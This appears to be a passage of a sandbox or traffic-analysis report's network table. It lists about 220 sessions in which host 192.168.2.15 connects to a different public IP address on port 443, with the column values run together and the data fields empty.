                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14524192.168.2.1536098137.57.13.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14525192.168.2.155671296.135.231.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14526192.168.2.154475044.51.92.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14527192.168.2.154955035.160.209.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14528192.168.2.1546990100.238.208.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14529192.168.2.1555766170.247.190.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14530192.168.2.1540588110.175.63.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14531192.168.2.1541464135.169.195.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14532192.168.2.153419434.74.54.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14533192.168.2.1549378223.212.23.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14534192.168.2.1552724157.221.41.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14535192.168.2.153611069.92.252.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14536192.168.2.155521093.86.41.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14537192.168.2.1560414126.244.231.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14538192.168.2.1538510213.210.213.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14539192.168.2.1541750208.188.187.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14540192.168.2.155320486.84.118.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14541192.168.2.155935457.21.102.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14542192.168.2.1553694158.19.199.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14543192.168.2.1553604191.231.229.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14544192.168.2.1559496218.171.229.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14545192.168.2.1538634131.191.110.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14546192.168.2.1552192170.160.250.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14547192.168.2.1550754172.203.52.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14548192.168.2.1538490122.232.88.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14549192.168.2.1560260115.250.32.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14550192.168.2.155898834.120.114.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14551192.168.2.15552325.157.5.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14552192.168.2.1540012125.130.236.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14553192.168.2.154421091.80.198.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14554192.168.2.1535720218.19.186.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14555192.168.2.1560204149.160.9.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14556192.168.2.154632294.166.49.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14557192.168.2.156022266.54.195.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14558192.168.2.154732471.124.111.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14559192.168.2.153575259.127.89.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14560192.168.2.154920282.116.156.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14561192.168.2.1546206217.198.200.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14562192.168.2.1542780144.61.77.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14563192.168.2.1541930161.164.220.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14564192.168.2.1541238221.117.49.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14565192.168.2.154275295.11.40.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14566192.168.2.1551702169.254.3.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14567192.168.2.153749698.253.79.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14568192.168.2.1535446180.49.145.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14569192.168.2.1543340195.159.134.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14570192.168.2.1538904157.119.92.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14571192.168.2.1556630139.66.217.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14572192.168.2.15404001.213.253.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14573192.168.2.155328440.66.215.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14574192.168.2.1556326166.184.125.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14575192.168.2.154557832.251.216.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14576192.168.2.154029884.161.28.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14577192.168.2.153446617.84.7.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14578192.168.2.1552922126.124.83.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14579192.168.2.154698447.152.129.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14580192.168.2.1545844124.82.236.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14581192.168.2.155110479.77.173.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14582192.168.2.1555588181.163.10.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14583192.168.2.1539734210.33.72.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14584192.168.2.155609012.247.16.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14585192.168.2.1547400100.202.245.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14586192.168.2.1534876119.95.28.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14587192.168.2.1557858114.182.103.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14588192.168.2.1538096110.128.117.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14589192.168.2.154604490.27.70.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14590192.168.2.155837894.55.182.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14591192.168.2.1547928110.46.134.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14592192.168.2.1560302134.218.234.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14593192.168.2.1560848107.170.221.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14594192.168.2.155091298.30.49.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14595192.168.2.1537910183.149.97.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14596192.168.2.155053452.172.246.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14597192.168.2.1538878219.251.20.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14598192.168.2.1538938155.44.182.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14599192.168.2.1550544130.234.35.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14600192.168.2.155776235.93.166.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14601192.168.2.153281464.197.104.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14602192.168.2.153509080.189.114.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14603192.168.2.1558156157.117.172.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14604192.168.2.1559326197.226.124.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14605192.168.2.1537568221.211.214.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14606192.168.2.1556994142.89.122.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14607192.168.2.1559388209.107.61.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14608192.168.2.1557430137.2.196.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14609192.168.2.1548080145.246.85.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14610192.168.2.1554562149.228.2.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14611192.168.2.1539112193.188.8.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14612192.168.2.1542702186.206.254.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14613192.168.2.153551839.41.58.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14614192.168.2.1547090219.121.188.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14615192.168.2.1539734172.226.255.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14616192.168.2.1536726131.129.43.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14617192.168.2.1559668200.112.239.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14618192.168.2.154913234.84.217.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14619192.168.2.154141894.245.33.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14620192.168.2.1544116197.118.155.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14621192.168.2.1558724169.142.28.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14622192.168.2.155170031.74.61.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14623192.168.2.1543856137.183.13.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14624192.168.2.155594249.26.241.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14625192.168.2.155236482.239.133.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14626192.168.2.1533580212.78.143.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14627192.168.2.1560920176.135.246.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14628192.168.2.1543528112.252.59.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14629192.168.2.1556070190.199.246.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14630192.168.2.153325412.3.15.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14631192.168.2.153792495.224.72.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14632192.168.2.154368445.40.216.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14633192.168.2.1543372132.88.199.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14634192.168.2.153726664.220.232.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14635192.168.2.1533134176.97.150.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14636192.168.2.153668467.217.28.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14637192.168.2.154270061.67.240.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14638192.168.2.1558702112.113.88.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14639192.168.2.1548250186.141.142.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14640192.168.2.155607691.120.88.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14641192.168.2.1541394165.248.172.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14642192.168.2.1556462109.72.125.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14643192.168.2.15491165.128.4.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14644192.168.2.155901612.83.223.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14645192.168.2.1552940105.68.12.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14646192.168.2.1540496140.179.137.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14647192.168.2.1537450128.125.75.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14648192.168.2.1548752124.227.131.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14649192.168.2.155618077.39.84.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14650192.168.2.153553054.136.98.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14651192.168.2.154451065.30.84.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14652192.168.2.1559270216.81.118.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14653192.168.2.1551292119.176.228.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14654192.168.2.1538174114.4.1.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14655192.168.2.1533270211.16.250.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14656192.168.2.1543138149.81.17.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14657192.168.2.153941480.198.239.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14658192.168.2.1560744145.92.196.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14659192.168.2.1552294220.153.134.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14660192.168.2.1544866119.1.80.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14661192.168.2.1543380197.156.186.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14662192.168.2.153776066.191.228.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14663192.168.2.1550568109.207.132.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14664192.168.2.1538646173.12.99.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14665192.168.2.153529014.31.153.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14666192.168.2.154661450.206.192.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14667192.168.2.154638095.203.61.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14668192.168.2.154476098.118.186.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14669192.168.2.1551240117.22.218.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14670192.168.2.1558518143.85.160.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14671192.168.2.1538904119.74.104.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14672192.168.2.1534798189.58.232.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14673192.168.2.1536756167.27.185.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14674192.168.2.154611264.52.195.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14675192.168.2.154609270.135.111.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14676192.168.2.1537840123.18.157.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14677192.168.2.154641245.214.1.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14678192.168.2.154978435.77.122.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14679192.168.2.1549588119.39.139.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14680192.168.2.1543212170.50.19.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14681192.168.2.154303617.132.241.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14682192.168.2.1543342162.70.208.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14683192.168.2.154823477.108.245.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14684192.168.2.1551092160.129.254.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14685192.168.2.1536466100.245.52.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14686192.168.2.1553586202.211.179.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14687192.168.2.1536254106.60.102.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14688192.168.2.1533414112.251.50.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14689192.168.2.153660034.203.54.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14690192.168.2.1540420109.37.25.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14691192.168.2.153351832.8.185.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14692192.168.2.1534568137.13.178.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14693192.168.2.154543070.42.234.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14694192.168.2.1559056183.22.175.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14695192.168.2.1536772101.161.48.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14696192.168.2.15494164.54.255.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14697192.168.2.1555718141.2.49.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14698192.168.2.154125065.87.40.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14699192.168.2.153317441.50.56.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14700192.168.2.1551790200.182.24.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14701192.168.2.153878692.80.14.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14702192.168.2.153615447.81.110.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14703192.168.2.1536808206.209.9.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14704192.168.2.156079014.253.92.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14705192.168.2.1544348192.242.47.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14706192.168.2.1552936126.239.58.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14707192.168.2.1544418179.172.57.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14708192.168.2.15485101.3.6.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14709192.168.2.1547180156.178.3.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14710192.168.2.1533000138.76.3.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14711192.168.2.1559958195.136.96.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14712192.168.2.15586489.158.62.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14713192.168.2.1559578157.40.47.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14714192.168.2.1543092118.147.207.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14715192.168.2.155637251.11.2.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14716192.168.2.1533266128.152.164.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14717192.168.2.1539368158.151.137.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14718192.168.2.155166018.34.72.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14719192.168.2.1549672141.223.92.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14720192.168.2.156011664.145.53.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14721192.168.2.1555928103.179.222.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14722192.168.2.1552300187.22.195.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14723192.168.2.155939659.186.45.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14724192.168.2.154383676.31.170.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14725192.168.2.155272213.58.29.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14726192.168.2.1547838213.161.51.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14727192.168.2.1557664223.127.188.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14728192.168.2.153688218.69.144.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14729192.168.2.1553132185.40.9.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14730192.168.2.1549988138.82.34.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14731192.168.2.1540262189.244.36.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14732192.168.2.1538188144.201.24.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14733192.168.2.1540380194.234.158.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14734192.168.2.153732861.102.77.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14735192.168.2.1533210217.171.106.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14736192.168.2.1543962160.235.106.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14737192.168.2.155804264.115.187.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14738192.168.2.1542938109.186.169.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14739192.168.2.153581659.65.192.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14740192.168.2.1542826149.64.191.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14741192.168.2.1534542128.222.106.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14742192.168.2.1548800212.213.194.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14743192.168.2.1536958129.201.71.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14744192.168.2.1533648133.91.105.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
